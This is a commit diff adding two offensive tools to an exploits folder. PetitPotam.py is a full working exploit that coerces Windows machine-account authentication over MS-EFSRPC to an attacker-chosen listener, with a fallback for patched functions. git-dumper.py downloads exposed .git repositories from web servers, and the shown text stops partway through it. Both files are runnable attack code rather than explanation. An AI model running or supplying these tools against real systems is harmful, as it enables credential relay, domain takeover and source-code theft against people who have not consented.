Repository restructuring
This commit is contained in:
461
tools/exploits/PetitPotam.py
Executable file
461
tools/exploits/PetitPotam.py
Executable file
@@ -0,0 +1,461 @@
|
||||
#!/usr/bin/env python
|
||||
#
|
||||
# Author: GILLES Lionel aka topotam (@topotam77)
|
||||
#
|
||||
# Greetz : grenadine(@Greynardine), skar(@__skar), didakt(@inf0sec1), plissken, pixis(@HackAndDo) my friends!
|
||||
# "Most of" the code stolen from dementor.py from @3xocyte ;)
|
||||
|
||||
|
||||
import sys
|
||||
import argparse
|
||||
|
||||
from impacket import system_errors
|
||||
from impacket.dcerpc.v5 import transport
|
||||
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
|
||||
from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR
|
||||
from impacket.dcerpc.v5.rpcrt import DCERPCException, RPC_C_AUTHN_WINNT, RPC_C_AUTHN_LEVEL_PKT_PRIVACY
|
||||
from impacket.uuid import uuidtup_to_bin
|
||||
|
||||
|
||||
show_banner = '''
|
||||
|
||||
___ _ _ _ ___ _
|
||||
| _ \ ___ | |_ (_) | |_ | _ \ ___ | |_ __ _ _ __
|
||||
| _/ / -_) | _| | | | _| | _/ / _ \ | _| / _` | | ' \
|
||||
_|_|_ \___| _\__| _|_|_ _\__| _|_|_ \___/ _\__| \__,_| |_|_|_|
|
||||
_| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""|
|
||||
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'
|
||||
|
||||
PoC to elicit machine account authentication via some MS-EFSRPC functions
|
||||
by topotam (@topotam77)
|
||||
|
||||
Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN
|
||||
|
||||
|
||||
'''
|
||||
|
||||
class DCERPCSessionError(DCERPCException):
    """DCERPC exception that renders MS-EFSR error codes as readable text
    using impacket's system_errors table."""

    def __init__(self, error_string=None, error_code=None, packet=None):
        DCERPCException.__init__(self, error_string, error_code, packet)

    def __str__(self):
        code = self.error_code
        # Unknown codes fall through to a bare hex dump.
        if code not in system_errors.ERROR_MESSAGES:
            return 'EFSR SessionError: unknown error code: 0x%x' % self.error_code
        messages = system_errors.ERROR_MESSAGES[code]
        return 'EFSR SessionError: code: 0x%x - %s - %s' % (self.error_code, messages[0], messages[1])
|
||||
|
||||
|
||||
################################################################################
# STRUCTURES
################################################################################
# NOTE: upstream defined EXIMPORT_CONTEXT_HANDLE twice with byte-identical
# bodies; the second definition merely rebound the name, so the duplicate
# has been removed.
class EXIMPORT_CONTEXT_HANDLE(NDRSTRUCT):
    """Opaque 20-byte RPC context handle returned by EfsRpcOpenFileRaw."""
    align = 1
    structure = (
        ('Data', '20s'),
    )
|
||||
# NDR structure definitions for MS-EFSR.  Only the fields needed to drive the
# coercion calls below are modelled; several are loose approximations of the
# on-the-wire types.

class EFS_EXIM_PIPE(NDRSTRUCT):
    # Raw byte pipe used by the import/export calls (':' = opaque bytes).
    align = 1
    structure = (
        ('Data', ':'),
    )

class EFS_HASH_BLOB(NDRSTRUCT):
    structure = (
        ('Data', DWORD),
        ('cbData', PCHAR),
    )

class EFS_RPC_BLOB(NDRSTRUCT):
    structure = (
        ('Data', DWORD),
        ('cbData', PCHAR),
    )


class EFS_CERTIFICATE_BLOB(NDRSTRUCT):
    structure = (
        ('Type', DWORD),
        ('Data', DWORD),
        ('cbData', PCHAR),
    )

class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT):
    structure = (
        # NOTE(review): 'Lenght' is a typo kept as-is -- it is the NDR field
        # name (a dict key at runtime), so renaming it would change behavior.
        ('Lenght', DWORD),
        ('SID', RPC_SID),
        ('Hash', EFS_HASH_BLOB),
        ('Display', LPWSTR),
    )

class ENCRYPTION_CERTIFICATE(NDRSTRUCT):
    structure = (
        ('Lenght', DWORD),
        ('SID', RPC_SID),
        ('Hash', EFS_CERTIFICATE_BLOB),

    )

class ENCRYPTION_CERTIFICATE_HASH_LIST(NDRSTRUCT):
    align = 1
    structure = (
        ('Cert', DWORD),
        ('Users', ENCRYPTION_CERTIFICATE_HASH),
    )

class ENCRYPTED_FILE_METADATA_SIGNATURE(NDRSTRUCT):
    structure = (
        ('Type', DWORD),
        ('HASH', ENCRYPTION_CERTIFICATE_HASH_LIST),
        ('Certif', ENCRYPTION_CERTIFICATE),
        ('Blob', EFS_RPC_BLOB),
    )

# NOTE(review): duplicate of EFS_RPC_BLOB defined above (identical body);
# rebinding the name is harmless but the second definition is redundant.
class EFS_RPC_BLOB(NDRSTRUCT):
    structure = (
        ('Data', DWORD),
        ('cbData', PCHAR),
    )

class ENCRYPTION_CERTIFICATE_LIST(NDRSTRUCT):
    align = 1
    structure = (
        ('Data', ':'),
    )
|
||||
|
||||
################################################################################
# RPC CALLS
################################################################################
# Request/response NDRCALL pairs for the MS-EFSR operations used (or probed)
# by this PoC.  Every request carries a UNC FileName; pointing it at the
# attacker's host is what coerces the target into authenticating outbound.

class EfsRpcOpenFileRaw(NDRCALL):
    opnum = 0
    structure = (
        ('fileName', WSTR),
        ('Flag', ULONG),
    )

class EfsRpcOpenFileRawResponse(NDRCALL):
    structure = (
        ('hContext', EXIMPORT_CONTEXT_HANDLE),
        ('ErrorCode', ULONG),
    )

class EfsRpcEncryptFileSrv(NDRCALL):
    opnum = 4
    structure = (
        ('FileName', WSTR),
    )

class EfsRpcEncryptFileSrvResponse(NDRCALL):
    structure = (
        ('ErrorCode', ULONG),
    )

class EfsRpcDecryptFileSrv(NDRCALL):
    opnum = 5
    structure = (
        ('FileName', WSTR),
        ('Flag', ULONG),
    )

class EfsRpcDecryptFileSrvResponse(NDRCALL):
    structure = (
        ('ErrorCode', ULONG),
    )

class EfsRpcQueryUsersOnFile(NDRCALL):
    opnum = 6
    structure = (
        ('FileName', WSTR),

    )

class EfsRpcQueryUsersOnFileResponse(NDRCALL):
    structure = (
        ('ErrorCode', ULONG),
    )

class EfsRpcQueryRecoveryAgents(NDRCALL):
    opnum = 7
    structure = (
        ('FileName', WSTR),

    )

class EfsRpcQueryRecoveryAgentsResponse(NDRCALL):
    structure = (
        ('ErrorCode', ULONG),
    )

class EfsRpcRemoveUsersFromFile(NDRCALL):
    opnum = 8
    structure = (
        ('FileName', WSTR),
        ('Users', ENCRYPTION_CERTIFICATE_HASH_LIST)

    )

class EfsRpcRemoveUsersFromFileResponse(NDRCALL):
    structure = (
        ('ErrorCode', ULONG),
    )

class EfsRpcAddUsersToFile(NDRCALL):
    opnum = 9
    structure = (
        ('FileName', WSTR),
        ('EncryptionCertificates', ENCRYPTION_CERTIFICATE_LIST)

    )

class EfsRpcAddUsersToFileResponse(NDRCALL):
    structure = (
        ('ErrorCode', ULONG),
    )

class EfsRpcFileKeyInfo(NDRCALL):
    opnum = 12
    structure = (
        ('FileName', WSTR),
        ('infoClass', DWORD),
    )

class EfsRpcFileKeyInfoResponse(NDRCALL):
    structure = (
        ('ErrorCode', ULONG),
    )

class EfsRpcDuplicateEncryptionInfoFile(NDRCALL):
    opnum = 13
    structure = (
        ('SrcFileName', WSTR),
        ('DestFileName', WSTR),
        ('dwCreationDisposition', DWORD),
        ('dwAttributes', DWORD),
        ('RelativeSD', EFS_RPC_BLOB),
        ('bInheritHandle', BOOL),
    )

class EfsRpcDuplicateEncryptionInfoFileResponse(NDRCALL):
    structure = (
        ('ErrorCode', ULONG),
    )

class EfsRpcAddUsersToFileEx(NDRCALL):
    opnum = 15
    structure = (
        ('dwFlags', DWORD),
        ('Reserved', EFS_RPC_BLOB),
        ('FileName', WSTR),
        ('dwAttributes', DWORD),
        ('EncryptionCertificates', ENCRYPTION_CERTIFICATE_LIST),
    )

class EfsRpcAddUsersToFileExResponse(NDRCALL):
    structure = (
        ('ErrorCode', ULONG),
    )

class EfsRpcFileKeyInfoEx(NDRCALL):
    opnum = 16
    structure = (
        ('dwFileKeyInfoFlags', DWORD),
        ('Reserved', EFS_RPC_BLOB),
        ('FileName', WSTR),
        ('InfoClass', DWORD),
    )

class EfsRpcFileKeyInfoExResponse(NDRCALL):
    structure = (
        ('ErrorCode', ULONG),
    )

class EfsRpcGetEncryptedFileMetadata(NDRCALL):
    opnum = 18
    structure = (
        ('FileName', WSTR),
    )

class EfsRpcGetEncryptedFileMetadataResponse(NDRCALL):
    structure = (
        ('ErrorCode', ULONG),
    )

class EfsRpcSetEncryptedFileMetadata(NDRCALL):
    opnum = 19
    structure = (
        ('FileName', WSTR),
        ('OldEfsStreamBlob', EFS_RPC_BLOB),
        ('NewEfsStreamBlob', EFS_RPC_BLOB),
        ('NewEfsSignature', ENCRYPTED_FILE_METADATA_SIGNATURE),
    )

class EfsRpcSetEncryptedFileMetadataResponse(NDRCALL):
    structure = (
        ('ErrorCode', ULONG),
    )

class EfsRpcEncryptFileExSrv(NDRCALL):
    opnum = 21
    structure = (
        ('FileName', WSTR),
        ('ProtectorDescriptor', WSTR),
        ('Flags', ULONG),
    )

class EfsRpcEncryptFileExSrvResponse(NDRCALL):
    structure = (
        ('ErrorCode', ULONG),
    )

# NOTE(review): kept disabled upstream -- PENCRYPTION_PROTECTOR_LIST is not
# defined anywhere in this file, so enabling this would raise a NameError.
#class EfsRpcQueryProtectors(NDRCALL):
#    opnum = 21
#    structure = (
#        ('FileName', WSTR),
#        ('ppProtectorList', PENCRYPTION_PROTECTOR_LIST),
#    )
#class EfsRpcQueryProtectorsResponse(NDRCALL):
#    structure = (
#        ('ErrorCode', ULONG),
#    )
|
||||
|
||||
################################################################################
# OPNUMs and their corresponding structures
################################################################################
# Request/response class pairs keyed by opnum; impacket uses this table to
# decode server replies.
OPNUMS = {
    0  : (EfsRpcOpenFileRaw, EfsRpcOpenFileRawResponse),
    4  : (EfsRpcEncryptFileSrv, EfsRpcEncryptFileSrvResponse),
    5  : (EfsRpcDecryptFileSrv, EfsRpcDecryptFileSrvResponse),
    6  : (EfsRpcQueryUsersOnFile, EfsRpcQueryUsersOnFileResponse),
    7  : (EfsRpcQueryRecoveryAgents, EfsRpcQueryRecoveryAgentsResponse),
    8  : (EfsRpcRemoveUsersFromFile, EfsRpcRemoveUsersFromFileResponse),
    9  : (EfsRpcAddUsersToFile, EfsRpcAddUsersToFileResponse),
    12 : (EfsRpcFileKeyInfo, EfsRpcFileKeyInfoResponse),
    13 : (EfsRpcDuplicateEncryptionInfoFile, EfsRpcDuplicateEncryptionInfoFileResponse),
    15 : (EfsRpcAddUsersToFileEx, EfsRpcAddUsersToFileExResponse),
    16 : (EfsRpcFileKeyInfoEx, EfsRpcFileKeyInfoExResponse),
    18 : (EfsRpcGetEncryptedFileMetadata, EfsRpcGetEncryptedFileMetadataResponse),
    19 : (EfsRpcSetEncryptedFileMetadata, EfsRpcSetEncryptedFileMetadataResponse),
    21 : (EfsRpcEncryptFileExSrv, EfsRpcEncryptFileExSrvResponse),
    # 22 : (EfsRpcQueryProtectors, EfsRpcQueryProtectorsResponse),
}
|
||||
|
||||
class CoerceAuth():
    """Connects to the target's named pipe, binds the EFSRPC interface, and
    fires the authentication-coercing call."""

    def connect(self, username, password, domain, lmhash, nthash, target, pipe, doKerberos, dcHost, targetIp):
        """Open an SMB named-pipe transport to *target* and bind MS-EFSR.

        Returns a bound DCERPC handle on success, or None on any failure
        (errors are printed, not raised, so the caller can try other pipes).
        """
        # Each supported pipe exposes the EFSR interface; 'efsr' uses the
        # dedicated efsrpc UUID, the others ride on the lsarpc interface UUID.
        binding_params = {
            'lsarpc': {
                'stringBinding': r'ncacn_np:%s[\PIPE\lsarpc]' % target,
                'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
            },
            'efsr': {
                'stringBinding': r'ncacn_np:%s[\PIPE\efsrpc]' % target,
                'MSRPC_UUID_EFSR': ('df1941c5-fe89-4e79-bf10-463657acf44d', '1.0')
            },
            'samr': {
                'stringBinding': r'ncacn_np:%s[\PIPE\samr]' % target,
                'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
            },
            'lsass': {
                'stringBinding': r'ncacn_np:%s[\PIPE\lsass]' % target,
                'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
            },
            'netlogon': {
                'stringBinding': r'ncacn_np:%s[\PIPE\netlogon]' % target,
                'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
            },
        }
        rpctransport = transport.DCERPCTransportFactory(binding_params[pipe]['stringBinding'])
        if hasattr(rpctransport, 'set_credentials'):
            rpctransport.set_credentials(username=username, password=password, domain=domain, lmhash=lmhash, nthash=nthash)

        if doKerberos:
            rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)
        if targetIp:
            rpctransport.setRemoteHost(targetIp)

        dce = rpctransport.get_dce_rpc()
        dce.set_auth_type(RPC_C_AUTHN_WINNT)
        dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
        print("[-] Connecting to %s" % binding_params[pipe]['stringBinding'])
        try:
            dce.connect()
        except Exception as e:
            print("Something went wrong, check error status => %s" % str(e))
            #sys.exit()
            return  # implicit None -> caller skips this pipe
        print("[+] Connected!")
        print("[+] Binding to %s" % binding_params[pipe]['MSRPC_UUID_EFSR'][0])
        try:
            dce.bind(uuidtup_to_bin(binding_params[pipe]['MSRPC_UUID_EFSR']))
        except Exception as e:
            print("Something went wrong, check error status => %s" % str(e))
            #sys.exit()
            return
        print("[+] Successfully bound!")
        return dce

    def EfsRpcOpenFileRaw(self, dce, listener):
        """Send EfsRpcOpenFileRaw with a UNC path pointing at *listener*,
        falling back to EfsRpcEncryptFileSrv when opnum 0 is patched.

        ERROR_BAD_NETPATH is the *success* signal: the target tried (and
        failed) to reach the attacker-controlled UNC path, meaning it
        authenticated outbound.
        """
        print("[-] Sending EfsRpcOpenFileRaw!")
        try:
            request = EfsRpcOpenFileRaw()
            # UNC path to the listener; the trailing NUL terminates the WSTR.
            request['fileName'] = '\\\\%s\\test\\Settings.ini\x00' % listener
            request['Flag'] = 0
            #request.dump()
            resp = dce.request(request)

        except Exception as e:
            if str(e).find('ERROR_BAD_NETPATH') >= 0:
                print('[+] Got expected ERROR_BAD_NETPATH exception!!')
                print('[+] Attack worked!')
                #sys.exit()
                return None
            if str(e).find('rpc_s_access_denied') >= 0:
                print('[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!')
                print('[+] OK! Using unpatched function!')
                print("[-] Sending EfsRpcEncryptFileSrv!")
                try:
                    request = EfsRpcEncryptFileSrv()
                    request['FileName'] = '\\\\%s\\test\\Settings.ini\x00' % listener
                    resp = dce.request(request)
                except Exception as e:
                    if str(e).find('ERROR_BAD_NETPATH') >= 0:
                        print('[+] Got expected ERROR_BAD_NETPATH exception!!')
                        print('[+] Attack worked!')
                        pass
                    else:
                        print("Something went wrong, check error status => %s" % str(e))
                        return None
                        #sys.exit()

            else:
                print("Something went wrong, check error status => %s" % str(e))
                return None
                #sys.exit()
|
||||
|
||||
def main():
    """Parse CLI options and run the coercion attempt over the chosen pipe(s)."""
    parser = argparse.ArgumentParser(add_help = True, description = "PetitPotam - rough PoC to connect to lsarpc and elicit machine account authentication via MS-EFSRPC EfsRpcOpenFileRaw()")
    parser.add_argument('-u', '--username', action="store", default='', help='valid username')
    parser.add_argument('-p', '--password', action="store", default='', help='valid password (if omitted, it will be asked unless -no-pass)')
    parser.add_argument('-d', '--domain', action="store", default='', help='valid domain name')
    parser.add_argument('-hashes', action="store", metavar="[LMHASH]:NTHASH", help='NT/LM hashes (LM hash can be empty)')

    parser.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
    parser.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
                        '(KRB5CCNAME) based on target parameters. If valid credentials '
                        'cannot be found, it will use the ones specified in the command '
                        'line')
    parser.add_argument('-dc-ip', action="store", metavar="ip address", help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter')
    parser.add_argument('-target-ip', action='store', metavar="ip address",
                        help='IP Address of the target machine. If omitted it will use whatever was specified as target. '
                             'This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it')

    parser.add_argument('-pipe', action="store", choices=['efsr', 'lsarpc', 'samr', 'netlogon', 'lsass', 'all'], default='lsarpc', help='Named pipe to use (default: lsarpc) or all')
    parser.add_argument('listener', help='ip address or hostname of listener')
    parser.add_argument('target', help='ip address or hostname of target')
    options = parser.parse_args()

    # -hashes is "LM:NT"; either half may be empty.
    if options.hashes is not None:
        lmhash, nthash = options.hashes.split(':')
    else:
        lmhash = ''
        nthash = ''

    print(show_banner)

    # Prompt for a password only when no other credential source was given.
    if options.password == '' and options.username != '' and options.hashes is None and options.no_pass is not True:
        from getpass import getpass
        options.password = getpass("Password:")

    plop = CoerceAuth()

    if options.pipe == "all":
        all_pipes = ['efsr', 'lsarpc', 'samr', 'netlogon', 'lsass']
    else:
        all_pipes = [options.pipe]

    for all_pipe in all_pipes:
        print("Trying pipe", all_pipe)
        dce = plop.connect(username=options.username, password=options.password, domain=options.domain, lmhash=lmhash, nthash=nthash, target=options.target, pipe=all_pipe, doKerberos=options.k, dcHost=options.dc_ip, targetIp=options.target_ip)
        if dce is not None:
            plop.EfsRpcOpenFileRaw(dce, options.listener)
            dce.disconnect()

    # NOTE(review): placed after the loop so '-pipe all' tries every pipe;
    # indentation was ambiguous in the reviewed copy -- confirm upstream.
    sys.exit()

if __name__ == '__main__':
    main()
|
||||
604
tools/exploits/git-dumper.py
Executable file
604
tools/exploits/git-dumper.py
Executable file
@@ -0,0 +1,604 @@
|
||||
#!/usr/bin/env python3
|
||||
from contextlib import closing
|
||||
import argparse
|
||||
import multiprocessing
|
||||
import os
|
||||
import os.path
|
||||
import re
|
||||
import socket
|
||||
import subprocess
|
||||
import sys
|
||||
import urllib.parse
|
||||
import urllib3
|
||||
|
||||
import bs4
|
||||
import dulwich.index
|
||||
import dulwich.objects
|
||||
import dulwich.pack
|
||||
import requests
|
||||
import socks
|
||||
|
||||
USER_AGENT = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
|
||||
|
||||
def printf(fmt, *args, file=sys.stdout):
    """printf-style helper: %-format *fmt* with *args* (when given), write
    the result to *file*, and flush immediately so progress shows up live."""
    text = fmt % args if args else fmt
    file.write(text)
    file.flush()
||||
|
||||
|
||||
def is_html(response):
    ''' Return True if the response is a HTML webpage '''
    # Heuristic: an opening <html> tag anywhere in the body.
    return response.text.find('<html>') != -1
||||
|
||||
|
||||
def get_indexed_files(response):
    ''' Return all the files in the directory index webpage '''
    page = bs4.BeautifulSoup(response.text, 'html.parser')
    found = []

    for anchor in page.find_all('a'):
        link = urllib.parse.urlparse(anchor.get('href'))

        # Keep only relative entries that stay inside the listed directory:
        # no scheme/netloc, no absolute path, no '.'/'..' navigation.
        is_relative = (not link.path.startswith('/') and
                       not link.scheme and
                       not link.netloc)
        if link.path and link.path not in ('.', '..', './', '../') and is_relative:
            found.append(link.path)

    return found
||||
|
||||
|
||||
def create_intermediate_dirs(path):
    ''' Create intermediate directories, if necessary '''
    parent = os.path.split(path)[0]

    if not parent or os.path.exists(parent):
        return
    try:
        os.makedirs(parent)
    except FileExistsError:
        # another worker process created it between the check and the call
        pass
||||
|
||||
|
||||
def get_referenced_sha1(obj_file):
    ''' Return all the referenced SHA1 in the given object file '''
    if isinstance(obj_file, dulwich.objects.Commit):
        # a commit points at its tree and at every parent commit
        refs = [obj_file.tree.decode()]
        refs.extend(parent.decode() for parent in obj_file.parents)
    elif isinstance(obj_file, dulwich.objects.Tree):
        # a tree points at each entry (blob or sub-tree)
        refs = [entry.sha.decode() for entry in obj_file.iteritems()]
    elif isinstance(obj_file, dulwich.objects.Blob):
        refs = []  # blobs are leaves
    else:
        printf('error: unexpected object type: %r\n' % obj_file, file=sys.stderr)
        sys.exit(1)

    return refs
||||
|
||||
|
||||
class Worker(multiprocessing.Process):
    ''' Worker for process_tasks: pulls tasks off a shared queue, runs
    do_task() on each, and pushes the resulting follow-up tasks back. '''

    def __init__(self, pending_tasks, tasks_done, args):
        super().__init__()
        self.daemon = True  # die with the parent instead of lingering
        self.args = args
        self.pending_tasks = pending_tasks
        self.tasks_done = tasks_done

    def run(self):
        # one-time per-process setup
        self.init(*self.args)

        # consume tasks until the poison pill (None) arrives
        for task in iter(lambda: self.pending_tasks.get(block=True), None):
            result = self.do_task(task, *self.args)
            assert isinstance(result, list), 'do_task() should return a list of tasks'
            self.tasks_done.put(result)

    def init(self, *args):
        raise NotImplementedError

    def do_task(self, task, *args):
        raise NotImplementedError
||||
|
||||
|
||||
def process_tasks(initial_tasks, worker, jobs, args=(), tasks_done=None):
    ''' Process tasks in parallel.

    initial_tasks -- iterable of seed tasks
    worker        -- Worker subclass instantiated *jobs* times
    jobs          -- number of worker processes
    args          -- extra positional args forwarded to worker.init/do_task
    tasks_done    -- optional iterable of tasks to treat as already processed
    '''

    if not initial_tasks:
        return

    # tasks_seen guards against re-queueing; the *parameter* tasks_done seeds
    # it, then the name is rebound to the result queue just below.
    tasks_seen = set(tasks_done) if tasks_done else set()
    pending_tasks = multiprocessing.Queue()
    tasks_done = multiprocessing.Queue()
    # invariant: num_pending_tasks == tasks queued but not yet reported back
    num_pending_tasks = 0

    # add all initial tasks in the queue
    for task in initial_tasks:
        assert task is not None

        if task not in tasks_seen:
            pending_tasks.put(task)
            num_pending_tasks += 1
            tasks_seen.add(task)

    # initialize processes
    processes = [worker(pending_tasks, tasks_done, args) for _ in range(jobs)]

    # launch them all
    for p in processes:
        p.start()

    # collect task results; each result may fan out into new tasks
    while num_pending_tasks > 0:
        task_result = tasks_done.get(block=True)
        num_pending_tasks -= 1

        for task in task_result:
            assert task is not None

            if task not in tasks_seen:
                pending_tasks.put(task)
                num_pending_tasks += 1
                tasks_seen.add(task)

    # send termination signal (task=None)
    for _ in range(jobs):
        pending_tasks.put(None)

    # join all
    for p in processes:
        p.join()
||||
|
||||
|
||||
class DownloadWorker(Worker):
    ''' Download a list of files '''

    def init(self, url, directory, retry, timeout, follow_redirects=False, module=None):
        # One session per worker process; TLS verification is deliberately
        # off (dump targets frequently use self-signed certificates).
        self.session = requests.Session()
        self.session.verify = False
        self.session.mount(url, requests.adapters.HTTPAdapter(max_retries=retry))
        self.module = module

    def do_task(self, filepath, url, directory, retry, timeout, follow_redirects=False, module=None):
        """Fetch url/filepath and mirror it under *directory*; returns no
        follow-up tasks."""
        with closing(self.session.get('%s/%s' % (url, filepath),
                                      allow_redirects=follow_redirects,
                                      stream=True,
                                      timeout=timeout,
                                      headers={"User-Agent": USER_AGENT})) as response:
            printf('[-] Fetching %s/%s [%d]\n', url, filepath, response.status_code)

            if response.status_code != 200:
                return []

            abspath = os.path.abspath(os.path.join(directory, filepath))
            create_intermediate_dirs(abspath)

            # write file (binary; git objects/packs are not text)
            with open(abspath, 'wb') as f:
                for chunk in response.iter_content(4096):
                    f.write(chunk)

            return []
||||
|
||||
|
||||
class RecursiveDownloadWorker(DownloadWorker):
    ''' Download a directory recursively '''

    def do_task(self, filepath, url, directory, retry, timeout, follow_redirects=False):
        """Fetch url/filepath; directory listings expand into further tasks,
        plain files are written to disk."""
        with closing(self.session.get('%s/%s' % (url, filepath),
                                      allow_redirects=follow_redirects,
                                      stream=True,
                                      timeout=timeout,
                                      headers={"User-Agent": USER_AGENT})) as response:
            printf('[-] Fetching %s/%s [%d]\n', url, filepath, response.status_code)

            # a redirect to the same path plus a trailing slash means
            # "this is a directory" -- requeue it as one
            if (response.status_code in (301, 302) and
                    'Location' in response.headers and
                    response.headers['Location'].endswith(filepath + '/')):
                return [filepath + '/']

            if response.status_code != 200:
                return []

            if filepath.endswith('/'):  # directory index
                assert is_html(response)

                return [filepath + filename for filename in get_indexed_files(response)]
            else:  # file
                abspath = os.path.abspath(os.path.join(directory, filepath))
                create_intermediate_dirs(abspath)

                # write file
                with open(abspath, 'wb') as f:
                    for chunk in response.iter_content(4096):
                        f.write(chunk)

                return []
||||
|
||||
|
||||
class FindRefsWorker(DownloadWorker):
    ''' Find refs/ '''

    def do_task(self, filepath, url, directory, retry, timeout, follow_redirects=False, module=None):
        """Fetch a ref-bearing file, save it, and return the ref paths (and
        their logs) mentioned inside it as new download tasks."""
        response = self.session.get('%s/%s' % (url, filepath),
                                    allow_redirects=follow_redirects,
                                    timeout=timeout,
                                    headers={"User-Agent": USER_AGENT})
        printf('[-] Fetching %s/%s [%d]\n', url, filepath, response.status_code)

        if response.status_code != 200:
            return []

        abspath = os.path.abspath(os.path.join(directory, filepath))
        create_intermediate_dirs(abspath)

        # write file (text mode: ref files are plain text)
        with open(abspath, 'w') as f:
            f.write(response.text)

        # find refs
        tasks = []

        # module = ".git/" if not url.endswith("/modules") else ""

        for ref in re.findall(r'(refs(/[a-zA-Z0-9\-\.\_\*]+)+)', response.text):
            ref = ref[0]  # findall returns (full match, last group) tuples
            if not ref.endswith('*'):  # skip wildcard patterns (packed-refs)
                tasks.append(self.module + '/%s' % ref)
                tasks.append(self.module + '/logs/%s' % ref)

        return tasks
||||
|
||||
|
||||
class FindObjectsWorker(DownloadWorker):
    ''' Find objects '''

    def do_task(self, obj, url, directory, retry, timeout, follow_redirects, module):
        """Fetch one loose object by SHA1, store it, and return the SHA1s it
        references (so the crawl walks the whole object graph)."""
        # module = ".git" if not url.endswith("/modules") else ""
        filepath = '%s/objects/%s/%s' % (self.module, obj[:2], obj[2:])
        response = self.session.get('%s/%s' % (url, filepath),
                                    allow_redirects=follow_redirects,
                                    timeout=timeout,
                                    headers={"User-Agent": USER_AGENT})
        printf('[-] Fetching %s/%s [%d]\n', url, filepath, response.status_code)

        if response.status_code != 200:
            return []

        abspath = os.path.abspath(os.path.join(directory, filepath))
        create_intermediate_dirs(abspath)

        # write file
        with open(abspath, 'wb') as f:
            f.write(response.content)

        try:
            # parse object file to find other objects
            obj_file = dulwich.objects.ShaFile.from_path(abspath)
            return get_referenced_sha1(obj_file)
        except Exception:
            # FIX: was a bare `except:`, which also swallowed SystemExit and
            # KeyboardInterrupt; corrupt/truncated objects are discarded so a
            # later `git checkout` does not trip over them.
            print("[-] Error parsing:", filepath)
            os.remove(abspath)
            return []
||||
|
||||
|
||||
def fetch_git(url, directory, jobs, retry, timeout, follow_redirects, module=".git"):
|
||||
''' Dump a git repository into the output directory '''
|
||||
|
||||
assert os.path.isdir(directory), '%s is not a directory' % directory
|
||||
|
||||
if module == ".git":
|
||||
assert not os.listdir(directory), '%s is not empty' % directory
|
||||
assert jobs >= 1, 'invalid number of jobs'
|
||||
assert retry >= 1, 'invalid number of retries'
|
||||
assert timeout >= 1, 'invalid timeout'
|
||||
|
||||
# find base url
|
||||
if not url.startswith("http://") and not url.startswith("https://"):
|
||||
url = "http://" + url
|
||||
|
||||
url = url.rstrip('/')
|
||||
if url.endswith('HEAD'):
|
||||
url = url[:-4]
|
||||
url = url.rstrip('/')
|
||||
if url.endswith('.git'):
|
||||
url = url[:-4]
|
||||
url = url.rstrip('/')
|
||||
|
||||
# check for /.git/HEAD
|
||||
printf('[-] Testing %s/%s/HEAD ', url, module)
|
||||
response = requests.get('%s/%s/HEAD' % (url, module), verify=False, allow_redirects=follow_redirects, headers={"User-Agent": USER_AGENT})
|
||||
printf('[%d]\n', response.status_code)
|
||||
|
||||
if response.status_code != 200:
|
||||
printf('error: %s/%s/HEAD does not exist\n', url, module, file=sys.stderr)
|
||||
return 1
|
||||
# elif not response.text.startswith('ref:'):
|
||||
# printf('error: %s/.git/HEAD is not a git HEAD file\n', url, file=sys.stderr)
|
||||
# return 1
|
||||
|
||||
# check for directory listing
|
||||
printf('[-] Testing %s/%s/ ', url, module)
|
||||
response = requests.get('%s/%s/' % (url, module), verify=False, allow_redirects=follow_redirects, headers={"User-Agent": USER_AGENT})
|
||||
printf('[%d]\n', response.status_code)
|
||||
|
||||
if response.status_code == 200 and is_html(response) and 'HEAD' in get_indexed_files(response):
|
||||
printf('[-] Fetching .git recursively\n')
|
||||
process_tasks(['.git/', '.gitignore'],
|
||||
RecursiveDownloadWorker,
|
||||
jobs,
|
||||
args=(url, directory, retry, timeout, follow_redirects))
|
||||
|
||||
printf('[-] Running git checkout .\n')
|
||||
os.chdir(directory)
|
||||
subprocess.check_call(['git', 'checkout', '.'])
|
||||
return 0
|
||||
|
||||
# no directory listing
|
||||
printf('[-] Fetching common files\n')
|
||||
tasks = [
|
||||
'.gitignore',
|
||||
module + '/COMMIT_EDITMSG',
|
||||
module + '/description',
|
||||
module + '/hooks/applypatch-msg.sample',
|
||||
module + '/hooks/applypatch-msg.sample',
|
||||
module + '/hooks/applypatch-msg.sample',
|
||||
module + '/hooks/commit-msg.sample',
|
||||
module + '/hooks/post-commit.sample',
|
||||
module + '/hooks/post-receive.sample',
|
||||
module + '/hooks/post-update.sample',
|
||||
module + '/hooks/pre-applypatch.sample',
|
||||
module + '/hooks/pre-commit.sample',
|
||||
module + '/hooks/pre-push.sample',
|
||||
module + '/hooks/pre-rebase.sample',
|
||||
module + '/hooks/pre-receive.sample',
|
||||
module + '/hooks/prepare-commit-msg.sample',
|
||||
module + '/hooks/update.sample',
|
||||
module + '/index',
|
||||
module + '/info/exclude',
|
||||
module + '/objects/info/packs',
|
||||
]
|
||||
|
||||
if module == ".git":
|
||||
tasks.insert(1, '.gitmodules')
|
||||
|
||||
process_tasks(tasks,
|
||||
